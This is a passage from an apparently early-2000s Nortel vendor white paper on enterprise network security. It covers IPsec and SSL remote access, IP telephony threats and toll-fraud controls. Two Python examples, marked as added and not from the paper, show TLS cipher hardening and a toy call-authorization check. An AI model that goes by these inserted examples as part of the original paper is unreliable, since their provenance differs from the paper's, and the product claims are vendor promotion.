Remote access enables “extended” and “open” enterprises to make efficient use of people and resources wherever they are
located—at home, on the road, using public PCs, or drop-in business centers in hotels. However, opening the network to
access from anywhere introduces security concerns.

One of the most prevalent security threats is a remarkably low-tech issue—theft of personal computers—that can lead to more
serious issues, i.e., using the stolen PC to steal locally stored data or to masquerade as a legitimate user to access the enterprise
network.

For that reason, sensitive information on systems used for remote access should be encrypted using a system that integrates
seamlessly into normal application use. Encryption systems are currently available that enable the user to operate normally,
not requiring manual or individual encryption/decryption of files. For example, entire file systems or “folders” can be stored
in encrypted form, with decryption being integrated in normal file system access.

Another threat occurs when the remote-access user is operating on an easily hacked wireless LAN, perhaps at home or in a
hotel. For wireless access, the user’s access device should be equipped with anti-virus software and an up-to-date personal
firewall that prevents unauthorized users from hacking into the user’s PC during an open communication session.

Figure 14. Securing remote access
(Diagram: a central site with redundant Secure IP Services Gateways (FW, IPsec, SRT, Auth) and an SSL VPN Gateway
(SSL, Auth), reached over the Internet from a home office, a hotel and an airport (each with FW, IPsec, VS and IDS on the
access device, or SSL from a browser), from a customer site, and from a payphone with a data jack.)

Securing dial-up access. Remote access over dial-up connections—such as ISDN switched access or a modem call over standard
telephone lines—must be protected with stringent access authentication and authorization procedures. Encryption adds
another level of security for confidential communications. Dial-up access itself is inherently risky, however, because a modem
line terminates inside the network and can therefore be used to circumvent the firewalls and other IP-based security controls
at the Internet perimeter. Direct switched access, widely used in the 1980s and early 1990s, is rapidly being replaced by
Internet-based remote access VPNs.

Remote access VPNs. Internet-based remote access provides tremendous flexibility and high bandwidth.
Two approaches are common:

• VPNs based on IPsec, with IPsec client software loaded on the user’s access device.
• SSL extranets, which use the SSL capability built into standard Web browsers and require no other client
software. We chose not to use the term “VPN” when describing SSL implementations, since SSL gives access only to an
application, not to the full network.

Let’s take a closer look at these popular VPN strategies.

IPsec-based VPNs
IPsec is a network-layer approach that can be used across applications. For example, an IPsec-based VPN connection can be
used to access e-mail, HR self-serve applications on the intranet, and browse the network. An IPsec “client” (the tunnel
software on the access device), such as Nortel Networks Contivity Multi-OS Client, must be installed on the access device—PC,
PDA, handheld computer, etc. The access device should also be loaded with anti-virus detection software.

Whether based on dial access to an ISP point of presence (POP) or on wired or wireless direct access, the VPN client authenti-
cates the user, verifies the integrity of the user’s computer system, and establishes a secure link (“ tunnel”) to the enterprise. The
VPN client ensures that the remote system is secure even during session setup, where exchange of authentication information is
encrypted.

Remote access VPNs must be able to detect and, if possible, bypass common Internet obstacles such as NAT and outbound
firewalls, such as when linking to the enterprise network from within another firewall-protected network. At minimum, the
VPN must tell the remote user the nature of obstacles encountered. An important feature of Nortel Networks Contivity client
is support for split tunneling, with simultaneous secure access to the enterprise and clear access to the public Internet. Split
tunneling should be enabled as a deliberate policy decision rather than by default: a client that is on the enterprise network
and the open Internet at the same time can act as a bridge between the two, so the personal firewall and anti-virus
requirements above matter most in this mode.

Remote access connections from the Internet are handled by an IPsec gateway system at the enterprise edge. Multiple gateways
with multiple paths to the Internet provide essential redundancy in case of the failure of any one path or device. Larger enter-
prises or those with critical confidentiality requirements should consider separation of gateways as well.

The effective IP services gateway should provide: simple client configuration; the ability to pass connections through to the
internal enterprise network as opposed to session termination; stateful firewall functionality that precludes the need for a
separate firewall; support for multiple authentication methods such as RADIUS, PKI, and LDAP, directory-based user ID and
password systems such as Microsoft Active Directory and Novell Directory Services, and smart card or token-card
authentication on users’ laptops. Support for L2TP and PPTP would also be beneficial.

SSL extranets
SSL is a session-layer approach that sits above TCP, which means that every application has to support SSL and have its own
user authentication approach. For example, when you go to Amazon.com, the SSL session is set up before you enter your user ID
or credit card number. User authentication could include going to an authentication server. Firewall traversal and NAT are
easily supported with SSL.

SSL is built into standard Web browsers such as Microsoft Internet Explorer, so no special client software is required. This
feature makes SSL extranets particularly attractive for scenarios where the enterprise doesn’t own or control the remote access
devices, or where users need access from public PCs.

Web browsers are common targets of hackers, but the benefits outweigh the risks, which can be mitigated by using personal
firewalls and intrusion-detection systems on the access device. The SSL protocol itself is application-independent and is
considered robust enough that it is used extensively for consumer access to online shopping Web sites.

However, Web browsers support SSL only for Web-enabled (HTML) applications. As a result, if an enterprise wants to use
SSL extranets for access to, say, its legacy supply chain management application, then either the application has to have an
HTML/SSL front end or an external application-specific gateway. Several vendors offer external gateways for common
applications, but every application will need to have a unique front end acquired or developed. In addition to this trade-off,
there are also potential incompatibilities among browsers and browser versions. For example, some browser and server
versions will negotiate down to very weak 40-bit export-grade encryption if 128-bit encryption is not available on both
sides, so the gateway should be configured to refuse weak cipher suites rather than rely on the browser’s defaults.
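An added example (not from the paper) of what refusing the weak fallback looks like on the client side, using Python’s standard ssl module. The thresholds (TLS 1.2 minimum, 128-bit symmetric strength) are assumptions, and the cipher-string keywords are OpenSSL’s:

```python
# Added example (not from the paper): how a client can refuse the weak
# fallback the text warns about, using Python's standard ssl module.
# The policy thresholds (TLS 1.2 minimum, 128-bit symmetric strength) are
# assumptions; the cipher-string keywords are OpenSSL's.
import ssl

MIN_STRENGTH_BITS = 128
ACCEPTED_PROTOCOLS = ("TLSv1.2", "TLSv1.3")


def hardened_client_context():
    """Client context that never negotiates export-grade or otherwise weak suites."""
    ctx = ssl.create_default_context()              # also verifies the server certificate
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2    # no SSLv3, TLS 1.0 or TLS 1.1 at all
    # Explicitly exclude export (40/56-bit), NULL, anonymous, DES/3DES, RC4 and MD5 suites.
    ctx.set_ciphers("HIGH:!aNULL:!eNULL:!EXPORT:!LOW:!DES:!3DES:!RC4:!MD5")
    return ctx


def weak_suites(ctx):
    """Suites the context would still offer below the threshold; should be empty."""
    return [c["name"] for c in ctx.get_ciphers() if c["strength_bits"] < MIN_STRENGTH_BITS]


def negotiated_is_acceptable(cipher):
    """Post-handshake check on SSLSocket.cipher(), which returns
    (suite name, protocol version, secret bits). Run it before sending any
    data, as a second line of defence if the context was configured elsewhere."""
    name, protocol, bits = cipher
    return protocol in ACCEPTED_PROTOCOLS and bits >= MIN_STRENGTH_BITS


if __name__ == "__main__":
    ctx = hardened_client_context()
    print("weak suites still offered:", weak_suites(ctx))                 # []
    print(negotiated_is_acceptable(("EXP-RC4-MD5", "SSLv3", 40)))         # False
    print(negotiated_is_acceptable(("ECDHE-RSA-AES128-GCM-SHA256", "TLSv1.2", 128)))  # True
```

The same two checks apply on the gateway side: restrict the offered suites in the configuration, and log or reject any session whose negotiated cipher falls below policy, since the browser population on uncontrolled PCs is exactly what cannot be trusted to choose well.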

In conclusion:
• SSL extranets operate above the transport layer, one application at a time; they are good for Web applications, extranets,
and limited application access, and don’t require any special client software. However, SSL extranets open up a large
security hole when used from uncontrolled PCs—such as public PCs in kiosks—which may lack personal firewalls and/or
be infected.
• IPsec VPNs operate at the network layer, are application agnostic, and require a PC client. IPsec VPNs provide complete
control over the security environment.
Nortel Networks offers both types of remote access. Contivity Secure IP Services Gateways lead the market in IPsec-based
remote access and remote office VPNs, with more than half a million VPN clients in service. Nortel Networks has recently
extended its Alteon portfolio to implement SSL extranets.

3.5 Securing IP telephony services

Enterprises are starting to roll out IP telephony solutions to reap the benefits of convergence in the LAN and the WAN,
and of converged applications. Every VoIP system is a hardware/software solution that comprises four logical functions:

• IP telephones and PC soft clients
• Communications servers (also called call management servers or gatekeepers)
• Media gateways that provide flexible network access, for example, via traditional PBXs and the public switched telephone
network (PSTN) and the public wireless network
• Application servers for such purposes as unified messaging, conferencing, and collaborative applications enabled by
Session Initiation Protocol (SIP)

These functions and related application servers—such as contact center systems—are distributed across a telephony- or
business-grade IP network that delivers the required levels of reliability, voice quality, and congestion management.
Extended reach and mobility are provided over wireless LANs and over the Internet via IP-VPNs.

IP telephony is very time-sensitive and critical to the business, and just like other data applications, subject to a variety
of attacks. For example:

• Attacks on the router can bring down both voice and data services
• Denial of Service can overload an IP telephony communications server or client
• Ping of Death (malformed, oversized ICMP packets) and ping floods can crash or disrupt VoIP devices
• Port scanning can find vulnerabilities in VoIP clients and servers
• Packet sniffing can record and/or intercept conversations
• IP spoofing can misrepresent the source or destination of the media or signaling stream
• Viruses, worms, Trojan horses, and time-triggered bombs can attack servers and clients

There have already been cases of hackers taking over IP clients—due to a lack of administration passwords in one case
(PingTel), and due to vulnerabilities associated with running XML on the phone in another (Cisco). However, while these
could be very disruptive, they are primarily a threat when running VoIP natively across the Internet and a relatively lesser
threat when run within the enterprise or over tunneled Internet connections. We are a few years away from seeing VoIP used
end-to-end between employees and the outside world; the security architecture for VoIP will be extended when standards,
public services, and interoperability have reached greater maturity.

Toll fraud prevention
“Toll fraud” theft of service occurs when a PBX and its communications facilities are accessed and used illegally by
unauthorized users—internal or external. Just like a computer hacker, PBX hackers look for weak spots in the PBX
and use an array of complex hacking tools ranging from password-stealing software to automatic dialers. Often,
hackers are difficult to detect until the damage is already done. With so many different internal and vendor or system
integrator technicians accessing the PBX as part of routine maintenance, PBX hackers are often discovered only after
they’ve had days or even weeks to access facilities and rack up hundreds or thousands of dollars on the enterprise
phone bill.

This complex problem requires sophisticated countermeasures, even in a world where the cost of an individual phone
call is measured in pennies. IP telephony solutions must offer toll fraud prevention and other features that work with
both VoIP and traditional telephony.

PBXs—such as Nortel Networks Meridian 1—and state-of-the-art IP telephony systems such as Nortel Networks
Succession CSE 1000 support toll-fraud prevention mechanisms. These mechanisms are founded on Telephony
Class of Service, which defines each user’s ability to make state, national, and international long distance
calls. The user can be denied all access, or allowed to make certain types of on-net/internal and off-net/external long
distance calls. The default for new phones is restricted calling. These rules can be applied on a time-of-day basis and be
overridden with an authorization code. Indirect access to long-distance calling is also controlled, including potential
access via speed call lists, call forwarding, through-dialing from voice mail, and DISA access for employees dialing
into the enterprise network remotely.
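The Class of Service rules above as an added worked example in Python (not Nortel code, and not how Meridian or Succession implement them). The class names, the dial-plan rules, the business hours, the after-hours clamp to local calling and the authorization codes are all constructed assumptions:

```python
# Added example (not Nortel code): a toy call-authorization check modelled on
# the Telephony Class of Service controls described above. The class names,
# dial-plan rules, business hours and authorization codes are assumptions.
from datetime import datetime, time
import hashlib

# Destination classes a set may reach, per Class of Service (assumed classes).
COS = {
    "restricted": {"internal"},                                   # default for new sets
    "local": {"internal", "local"},
    "national": {"internal", "local", "national"},
    "unrestricted": {"internal", "local", "national", "international"},
}
BUSINESS_HOURS = (time(8, 0), time(18, 0))   # outside this window sets are clamped to "local"

# Constructed sample times used by the demo and tests.
WORKDAY = datetime(2024, 3, 4, 10, 30)
NIGHT = datetime(2024, 3, 4, 22, 15)


def _digest(code):
    return hashlib.sha256(code.encode()).hexdigest()


# Authorization codes are kept hashed, mapped to the CoS they grant (constructed sample).
AUTH_CODES = {_digest("482117"): "national", _digest("930046"): "unrestricted"}


def classify(dialed):
    """Assumed North American style dial plan: 4-digit extensions are internal,
    7 or 10 digits are local, 1 + 10 digits national, 011 or + international."""
    digits = "".join(ch for ch in dialed if ch.isdigit())
    if dialed.strip().startswith("+") or digits.startswith("011"):
        return "international"
    if len(digits) == 4:
        return "internal"
    if len(digits) == 11 and digits.startswith("1"):
        return "national"
    if len(digits) in (7, 10):
        return "local"
    return "unknown"


def effective_cos(set_cos, when, auth_code):
    """A valid authorization code overrides the set's CoS; an invalid one denies
    everything (returns None). Without a code, the time-of-day rule applies."""
    if auth_code is not None:
        return AUTH_CODES.get(_digest(auth_code))
    if set_cos == "restricted":
        return set_cos
    in_hours = BUSINESS_HOURS[0] <= when.time() < BUSINESS_HOURS[1]
    return set_cos if in_hours else "local"


def authorize(set_cos, dialed, when, auth_code=None):
    """Return (allowed, reason) for a set with `set_cos` dialing `dialed` at `when`."""
    dest = classify(dialed)
    if dest == "unknown":
        return False, "unrecognized number"
    cos = effective_cos(set_cos, when, auth_code)
    if cos is None:
        return False, "invalid authorization code"
    if dest in COS[cos]:
        return True, f"{dest} permitted by {cos}"
    return False, f"{dest} denied by {cos}"


def forward_call(forwarding_set_cos, target, when):
    """Indirect access: a call forwarded off-net (or placed from a speed-call
    list or voice-mail through-dial) is checked against the CoS of the set that
    owns the forwarding, not the CoS of whoever dialed in."""
    return authorize(forwarding_set_cos, target, when)


def disa_call(auth_code, dialed, when):
    """DISA: a remote caller has no set CoS, so nothing is granted without a valid code."""
    if auth_code is None:
        return False, "authorization code required"
    return authorize("restricted", dialed, when, auth_code)


if __name__ == "__main__":
    print(authorize("national", "1 212 555 0100", WORKDAY))           # (True, 'national permitted by national')
    print(authorize("national", "1 212 555 0100", NIGHT))             # (False, 'national denied by local')
    print(authorize("national", "1 212 555 0100", NIGHT, "482117"))   # (True, 'national permitted by national')
    print(forward_call("restricted", "1 212 555 0100", WORKDAY))      # (False, 'national denied by restricted')
    print(disa_call("930046", "011 44 20 7946 0000", NIGHT))          # (True, 'international permitted by unrestricted')
```

Two details carry the security point: an invalid authorization code denies the call outright instead of falling back to the set’s own class, and every indirect path (forwarding, speed call, voice-mail through-dial, DISA) is pushed through the same `authorize` check, which is where toll-fraud controls most often get bypassed in practice.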

Figure 15. Securing IP telephony
(Diagram: IP telephony, multimedia application, unified messaging and contact center servers and an IP-enabled PBX, each
protected by IDS and VS, on a management VLAN behind a Layer 2 switch; a telephony-grade IP network providing SRT,
NAT, FW, IDS, IPsec, AL and Auth; and endpoints including IP sets, digital sets, PC soft clients, SIP-enabled devices and
802.11 wireless clients, each behind FW/IPsec and VS/IDS.)

Securing IP telephony requires a coordinated approach across all aspects of the Unified Security Architecture. Policy manage-
ment and secure access management authenticate users and authorize the use of features and calling capabilities. Management
security secures management of VoIP devices such as communications servers and media gateways.

Security mechanisms that have been implemented for IP data can be extended to cover IP telephony—for example, using
IPsec and IP-VPNs for secure remote access and branch connectivity for VoIP and data, and for wireless LAN access. Stateful
inspection firewalls and network address translation can be applied to VoIP services. Policies governing data and VoIP should
be integrated under policy management. Application-level security is provided through such methods as OS hardening,
PC-based virus protection, and personal firewalls.

Securing IP telephony at the “application security level”

Securing application and IP telephony communications servers. The heart of the IP telephony system is the communica-
tions server—which can be a standalone server, such as the Nortel Networks Succession CSE 1000/2000 server, or integrated
with other components, such as Nortel Networks IP-enabled Meridian system and Business Communications Manager.
Equally important are application servers delivering contact center services (such as Nortel Networks Symposium), multimedia
applications (such as Nortel Networks CSE Multimedia Xchange), unified messaging (such as Nortel Networks CallPilot),
and self-serve interactive voice response systems. Securing these servers starts with hardening of the operating systems.

Securing VoIP clients. VoIP solutions support a broad range of clients and access configurations, including IP wired and
wireless telephones (e.g. Nortel Networks i2002 and i2004, and Symbol’s wireless LAN IP phone) and PC-based soft clients
(e.g. Nortel Networks i2050 and SIP clients). When connected to an IP network, these clients are vulnerable to attack.

There are a number of different telephony signaling protocols, such as SIP, H.323, UniStim (used by Nortel Networks IP
telephones), and Meridian Customer Defined Networking for network-wide feature operation. In the future, the ability to
secure signaling traffic at the VoIP client will be generally available. In IP telephony systems, the voice signal is packetized
using a codec such as G.729 (at 8 kbps) with a speech activity detection algorithm, and carried by the Real-time Transport
Protocol (RTP) over UDP at the transport level. Encryption of the voice at the source will emerge as an option, as required by
special sectors such as the military community.

The process is different for securing IP telephones and PC-based soft telephony clients:

• IP telephones, such as Nortel Networks i2004/2002, are custom-built appliances for telephony only. There is no storage
or asset on the phone itself to protect other than its presence on the network as a trusted device. The identity of the
caller and the call itself are the only assets to be protected. These telephony appliances most commonly use a proprietary
thin client protocol that relies on the communications server for features, functionality, and security. Approaches that run
XML applications on the set itself for feature operation expose a larger attack surface.
• VoIP soft clients on users’ PCs co-exist with other applications and assets, and run widely available operating systems. That
means a successful attack can damage several valued assets, so these devices should be protected with personal
firewalls, anti-virus detection, and IP-VPN clients—the same mechanisms used for data security on that access device.

Securing IP telephony at the “network security level”

Securing VoIP in the wiring closet and across the campus. IP devices are wired into a campus network using either shared
media or, more commonly, dedicated switched Ethernet connections. Wireless LANs are being widely adopted, especially in
education and healthcare environments.

VoIP soft clients and dedicated VoIP appliances should be connected to switched Ethernet environments right to the desktop,
for the following reasons:

• VoIP latency variation is minimized by eliminating CSMA/CD operation of shared media Ethernet operation
• Other devices are prohibited from eavesdropping on VoIP calls
Enterprises may also choose to logically group VoIP telephones in their own VLANs to enhance security and manageability.
Special considerations apply when using wireless LANs (WLANs) to extend IP telephony services within the enterprise; for
example, from the desktop to conference rooms, classrooms, or shop floor personnel. Because wireless LANs are relatively
insecure, both the signaling and voice planes need added security over the wireless segment of the call path. One method is to
configure soft clients co-resident with an IP-VPN client on the access device. Alternatively, some WLAN IP phones have built-
in encryption and authentication. Nortel Networks has a strategic partnership with Symbol, whose WLAN IP phones support
128-bit WEP encryption between the client and the wireless access point, plus Kerberos authentication. Note that WEP has
known cryptographic weaknesses regardless of key length, so it should be treated as a first layer only, with the IP-VPN (or a
stronger WLAN security standard as it becomes available) providing the real protection for the call.

Securing branches for IP telephony. Several approaches are available for securing remote office VoIP solutions. For example,
an enterprise could:

• Support VoIP telephones and soft clients from an “office-in-a-box” system that integrates IP telephony capabilities and
VPN security, such as Nortel Networks Business Communications Manager with integrated Contivity IP-VPN client.
• Leverage the distributed nature of VoIP by deploying clients off a centralized server such as a Nortel Networks IP-enabled
Meridian platform, CSE 1000 server, and CSE MX server, and running this traffic over an IP-VPN.
• Support a Nortel Networks Remote Office 9150 VoIP telephone off a central site IP-enabled Meridian PBX, which
supports Meridian digital telephones over an IP-VPN infrastructure while supporting a fully featured back-up path by
tunneling over the PSTN. This approach is unique to Nortel Networks.
Nortel Networks Contivity IP-VPN solution is unique for its Secure Routing Technology, which minimizes latency for VoIP
calls through meshed connectivity of secure tunnels over the Internet. This same solution can provide security for voice and
data traffic traversing frame relay networks.

Figure 16. Securing remote networking for IP telephony
(Diagram: a remote office with IP sets, IP telephony and SIP soft clients, 802.11 wireless, IDS and VS, behind a Secure IP
Services Gateway (FW, IPsec, SRT); central-site Secure IP Services Gateways (FW, IPsec, SRT, Auth); and mobile users,
including SIP and data soft clients, reaching the central site over the Internet from a hotel, an airport, a customer site and a
payphone with a data jack, using FW, IPsec, VS and IDS on the access device or SSL from a browser.)

Securing remote access for IP telephony. At home, in a hotel, or on the road, remote users can benefit from the convenience,
control, and productivity of IP telephony. To secure this kind of telephony access, VoIP soft clients would be co-resident with
an IP-VPN client on a laptop—and ultimately on a suitably equipped PDA—for mobile employees. This same configuration
is used to take advantage of WLAN access points in hotels, airports, and convention centers. VoIP telephones for telecom-
muters and remote contact center agents could be secured with a home office IP-VPN, such as a Contivity 1000 Secure IP
Services Gateway.

Network management security for IP telephony. Management of IP telephony services should be protected with the same
level of network management security accorded to the network and security infrastructure in general.

A physically dedicated Ethernet port should be configured for VoIP management functions—part of a management VLAN
that blocks all non-management traffic at the routing level via access lists and perimeter security, and has all unused ports
turned off. Only authorized application software should be run on the servers in this VLAN. Multi-level security should be
applied with various levels of privileges (monitor, configure, control) for authenticated operational personnel. User passwords
must be stored securely, and password format and change management strictly controlled. Management traffic (such as billing
information) can optionally be encrypted using IP-VPN technology, even for internal transmission. Off-net access for
suppliers, system integrators, and/or VARs can be provided via IP-VPNs.

Securing Web-enabled contact centers for IP telephony


Web-enabled contact centers are a key platform for offering “engaged” customer services that seamlessly integrate Web
and telephony interfaces with the organization. Using IP telephony in contact centers makes it cost-effective to widely
distribute agents, without compromising features and functionality.

However, because of the inherent security exposures of the Web interface and the critical nature of telephony services,
special security considerations apply. Securing servers at the application and OS levels is based on hardened OS
architectures and off-the-shelf security packages. Securing server management is based on partitioned operations using
VLANs and on remote access via IP-VPNs. IP-VPNs are also used to secure remote VoIP agents operating over the
public network.

Part IV. Nortel Networks technology and expertise
Nortel Networks has defined a new strategy for the enterprise network, known as One Network. A World of Choice.
One Network because it supports infrastructure convergence and eliminates boundaries. A World of Choice because
it delivers options on how enterprises build the optimal networks to suit their needs. The vision is of a single, converged
network that answers the critical business realities that strain and constrain today’s networks.

Absolutely central to this vision is the principle that security is inherent in all applications and services—intrinsic to the very
DNA of the network. The Unified Security Architecture outlined in this document represents the Nortel Networks blueprint
for that new enterprise network.

Within this One Network. A World of Choice. strategy, security provisions are in place to:

• Make enterprise networking products secure from a management perspective.
• Address network and voice/multimedia application security needs.
• Evolve from a perimeter-based security model towards a distributed and layered network security architecture with
centralized administration.
• Deliver reliable high-performance security solutions, including VoIP and wireless.
• Provide choices to enterprises in meeting their security requirements, driven by their business needs.
• Leverage industry-leading technologies and solutions across enterprise and service provider markets.

4.1. Design tenets built into the Nortel Networks security portfolio
Nortel Networks enterprise networking products—including security products and solutions—have been designed and built to
adhere to the following tenets:

Security in the DNA means Nortel Networks security products—such as Alteon Switched Firewall, Alteon SSL Accelerator,
and Contivity Secure IP Services Gateways—are designed from the ground up with security in mind.

Failsafe business continuity relies on network resilience from the physical layer to the application layer for mission-critical
applications and data, using ‘session persistence,’ load balancing, acceleration methods, and optical technologies. For example,
the Alteon Security Cluster provides a comprehensive security framework that delivers multi-gigabit acceleration and integrates
firewalls, SSL offload, intrusion-detection, and anti-virus protection into a scalable, easy-to-manage architecture.

Scalability by design extends and protects network investments and lowers operational costs. The Alteon Switched Firewall,
delivering the highest capacity in the industry at 3 Gbps, demonstrates this tenet in practice.

Application-optimized network components such as the Alteon SSL Accelerator combine “network-assisted” security with
network intelligence to add a layer of security across multiple applications while optimizing server performance.

Communications convergence ensures that IP telephony and multimedia applications such as Nortel Networks Succession
products can securely operate within both the enterprise environment and across the Internet.

Engaged applications deliver timely, context-sensitive, user-aware content to users as quickly, efficiently, and securely as
possible across multiple service delivery channels.

Comprehensive management ensures that security policies are effectively and consistently implemented throughout the
network. For example, Optivity Policy Services complements other Optivity management solutions to secure the management
system and enhance survivability.

Figure 17. Design tenets behind Nortel Networks products

Security in the DNA

Scalability by design

Fail-safe business continuity

Communications convergence

Comprehensive management

Application-optimized network

Engaged applications

These design tenets apply to the entire Nortel Networks portfolio, including for example:
• Alteon switches that provide firewall/IDS/IP-VPN load balancing and content filtering
• Passport 8600 routing switches that provide extensive filtering and access list controls, as well as firewall/IDS/IP-VPN
load balancing when equipped with an Alteon Web Switching Module. The Passport 8600 is a 256 Gbps platform so
robust that it is used in service provider central offices
• Ethernet hubs and switches from the BayStack portfolio that support VLANs and user authentication via EAP

Security is also a key element of Nortel Networks applications for IP telephony and multimedia, contact centers, unified
messaging, and more. Integration with solutions from our business partners delivers important capabilities such as intrusion-
detection, anti-virus, content filtering, and authentication. Whether offered as intrinsic features in multi-purpose products—
or purpose-built security devices—Nortel Networks security solutions protect the network and applications with high
performance and low cost of ownership.

4.2. Expanded choice through partnerships

Nortel Networks partners with service providers to enable them to offer best-in-class secure managed service solutions.
For example, our Contivity systems have been deployed by the majority of the world’s leading service providers for their
managed IP-VPN services. Nortel Networks Shasta Broadband Service Node (which uses the same VPN client as Contivity)
is the foundation for many providers’ network-based IP services—including VPNs, firewalls, and other security services.

Nortel Networks also partners with best-of-breed security application vendors for two types of collaboration:
• Working with select security application vendors to achieve full code integration with the Alteon Open Security
Architecture for the purposes of accelerating existing security technologies.
• Ensuring seamless interoperability with third-party security methods for authentication (RADIUS, digital certificate/PKI,
hardware/software tokens, and smart card), intrusion-detection, anti-virus, content filtering, firewall reporting, and more.

4.3. Security services

With new data privacy legislation pending and enacted, a constantly changing scene of network threats and vulnerabilities,
and IT security teams operating on limited budgets and manpower, many enterprises turn some or all of their security
functions over to certified security specialists. Security consulting services can help the enterprise move forward with confidence to:

• Achieve and maintain compliance with Gramm-Leach-Bliley, HIPAA, and other legislation.
• Obtain objective third-party validation of their security implementation, policy, and practices.
• Establish security baseline information from thorough vulnerability analysis of the network, overall site surveys of wireless
nodes added to the wired network, and other security services.

Organizations in the health care, financial, and insurance industries would be particularly interested in any or all of the
following services related to recent Federal legislation:

• Assessing and analyzing the current network and environment for compliance with new industry regulations
• Developing plans to address noncompliant areas
• Implementing policies, procedures, processes, and the technology to meet the new standards
• Certifying that the enterprise organization complies with regulations and legislation
• Monitoring to assure continued compliance

Nortel Networks partners with security services vendors (e.g. Olympus Security Group) with CISSP-certified personnel
to provide security deployment assistance, security training, security assessments, and regular security audits to ensure new
products and/or practices have not defeated security policies.

4.4. Nortel Networks product assurance


Nortel Networks product assurance initiatives ensure that security functions perform to industry-accepted standards and
specifications, where they exist.

Firewalls. Nortel Networks firewalls have been or are being certified by the International Computer Security Association (ICSA),
an internationally recognized, independent organization that enforces strict standards of certification for security products.

Encryption. Nortel Networks Contivity and Alteon SSL Accelerator products have achieved compliance with U.S. Federal
Information Processing Standard (FIPS) 140. To earn this status, cryptographic modules are tested by accredited laboratories
and assigned a rating from 1 to 4 (lowest to highest) in 11 key design and implementation areas. The overall testing program is
overseen by the U.S. National Institute of Standards and Technology (NIST) and the Communications Security Establishment
(CSE) of the Government of Canada.

Common Criteria international certification. Responding to the newly established and globally accepted “Common Criteria”
evaluation program, Nortel Networks has begun work to obtain this certification for key products, first for Alteon Switched
Firewall and Contivity Secure IP Services Gateways.

A closer look at Common Criteria
The Common Criteria initiative is an international effort to develop common IT security evaluation criteria. It is structured
as a taxonomy of security requirements, specified either as “Protection Profiles” or as a “Security Target.”

“Protection Profiles” are customer- or community of interest-generated sets of security requirements that are made
publicly available before, during, or after certification as reusable by any organization or group with similar needs.
These profiles can be established as standards for a particular application area such as electronic commerce, a govern-
ment-authored list of requirements for a particular type of product such as a firewall, a particular market place vertical
such as healthcare, or a customer’s own list of requirements.

“Security Targets” are the security objectives of a specific product or system, known as the Target of Evaluation (TOE).
The Target can conform to one or more Protection Profiles as part of its evaluation.

The document—International Common Criteria for Information Technology Security Evaluation—specifies security
functionality and evaluation methods, based on the original United States government Orange Book or Trusted
Computer System Evaluation Criteria (TCSEC), Canada’s Trusted Computer Product Evaluation Criteria (CTCPEC),
and Europe’s Information Technology Security Evaluation Criteria (ITSEC), which itself combines the Dutch, French,
and German criteria and the UK Confidence Levels.

To date, the Common Criteria have been formally recognized by 23 countries. Common Criteria (CC) v2.0 was released
in 1998, and the subsequent v2.1 (1999) has been adopted by the International Organization for Standardization (ISO) as
standard ISO/IEC 15408. For more information, see the Nortel Networks Common Criteria datasheet.

4.5. Nortel Networks and cross-industry security developments

Nortel Networks participates actively in ongoing security standards development within the Internet Engineering Task Force
(IETF), the International Telecommunication Union (ITU), and the European Telecommunications Standards Institute (ETSI)
on topics including IPsec, NAT, PKI, and SYSLOG, as well as in the following international private and public sector
organizations, which work to find solutions for the growing number of security vulnerabilities on a worldwide basis:

• Internet Security Alliance. Nortel Networks is a founding sponsor of this organization, created to share information and
lead thought on information security issues. It is a collaborative effort between the Carnegie Mellon University Software
Engineering Institute (SEI), the Carnegie Mellon CERT® Coordination Center (CERT/CC), and the Electronic
Industries Alliance (EIA), a federation of trade associations. The Internet Security Alliance represents industry’s interests
before legislators and regulators, and creates a collaborative environment to identify and standardize best practices and
solutions.
• National Reliability and Interoperability Council (NRIC). Part of the Homeland Security Working Group, the NRIC
works to ensure the optimal reliability, interoperability, accessibility, and interconnectivity of public telecommunications
networks.
• The Telecommunications—Information Sharing and Analysis Center (Telecom-ISAC). Nortel Networks cooperates
with this subgroup of the National Coordinating Center for Telecommunications (NCC), which facilitates voluntary
collaboration and information sharing among government and industry ISAC members. The NCC gathers information on
threats, outages, intrusions, and anomalies; analyzes and sanitizes the information; disseminates the information in accord
with sharing agreements; and alerts others in “near real time.”
• National Security Telecom Advisory Committee (NSTAC). Nortel Networks participates in the Network Security
Information Exchange (NSIE) subcommittee of this group, driving the establishment of a common security baseline for
enterprises and carriers to reduce customer operating expense and vendor R&D expense.
• Joint Group on Network and Information Security (NIS). This is a new European initiative formed by ETSI and the
European Committee for Standardization. NIS helps coordinate effective use of security standards to establish trust
on the Internet. Nortel Networks chairs NIS.
Nortel Networks maintains an internal cross-functional team—the Security Advisory Task Force (SATF)—which reports to the
Chief Technology Officer and addresses security vulnerabilities that could impact Nortel Networks products, as soon as these
vulnerabilities are discovered.

This internal task force has established relationships with key security vulnerability agencies in the industry such as CERT,
SANS, and ISA to ensure rapid awareness of new vulnerabilities. A process has been established to determine the level of risk
of each potential vulnerability to Nortel Networks customers, along with a risk mitigation plan, where required.

Where appropriate, the vulnerability status of Nortel Networks portfolio is communicated in Vendor Statements on the
corresponding CERT Web page and through action bulletins created with internal product teams that specify a risk analysis,
vulnerability status, mitigation plan, and planned patch release dates. These bulletins are made available to customers,
customer support teams, and account teams. Finally, the team follows up on all issues until closure.

Summary
The typical enterprise “internal” trusted network is anything but internal these days. It extends to include supply chain
partners, telecommuters, remote access users, Web users, application service providers, disaster recovery providers, and more.
Unfortunately, that means that the network also reaches hackers, cyber-thieves, disgruntled employees, and others who would
misappropriate network resources for personal gain.

Whether or not they leverage the inherently insecure Internet for business applications, all enterprises have an obligation to
protect network integrity and data confidentiality—for their own sakes as well as for their customers and business partners.

The good news is that enterprises can minimize their risks from unauthorized users without sacrificing performance for legiti-
mate users. The Nortel Networks Unified Security Architecture defines a conceptual, physical, and procedural framework of
best recommendations for end-to-end enterprise network security. Addressing the Top Ten security challenges with flexible
implementation choices, this comprehensive security strategy is based on these key principles:

1. Multi-layer security that defines security protection functions at application, network-assisted, and network security
levels
2. Variable-depth security across the enterprise, not just at the edge of the Internet
3. Closed-loop policy management that entails continuous evolution of policy to address changing business requirements,
network conditions, and industry knowledge
4. Uniform access management via stringent authentication and authorization at a granular level, defined and managed
centrally for the entire enterprise
5. Secure network operations, by physically or logically partitioning network management from user traffic, and applying
security best practices to suit critical operational activities
6. Secure multimedia communications, protected by high-performance encryption and tunneling
7. Survival under attack, ensuring that the network continues to deliver critical services even as it detects and wards off
malicious activities

The principles underpinning the Unified Security Architecture offer enterprises a blueprint for implementing security solutions
to ensure information integrity and confidentiality across a full range of network applications and architectures, including
